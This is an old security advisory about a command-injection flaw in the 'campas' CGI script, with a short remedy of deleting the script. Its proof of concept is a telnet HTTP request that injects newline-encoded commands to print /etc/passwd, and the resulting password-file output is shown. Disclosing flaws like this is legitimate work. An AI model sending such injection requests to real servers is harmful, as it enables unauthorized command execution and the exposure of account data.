COMMAND

    campas.cgi

SYSTEMS AFFECTED

    Systems with this CGI

PROBLEM

    Francisco Torres posted about following cgi security bug.

    CGI:    campas
            #!/bin/sh
            #pragma ident "@(#)campas.sh    1.2 95/05/24 NCSA"

    With this is CGI is  possible to execute command.   Exploit should
    go:

        > telnet www.xxxx.net 80
        Trying 200.xx.xx.xx...
        Connected to venus.xxxx.net
        Escape character is '^]'.
        GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
        <PRE>
        root:x:0:1:Super-User:/export/home/root:/sbin/sh
        daemon:x:1:1::/:
        bin:x:2:2::/usr/bin:
        sys:x:3:3::/:
        adm:x:4:4:Admin:/var/adm:
        lp:x:71:8:Line Printer Admin:/usr/spool/lp:
        smtp:x:0:0:Mail Daemon User:/:/bin/false
        .... continue :P

SOLUTION

    You may either  erase this CGI  if not in  use or you  can not use
    this CGI anymore (and at that point you can erased it too).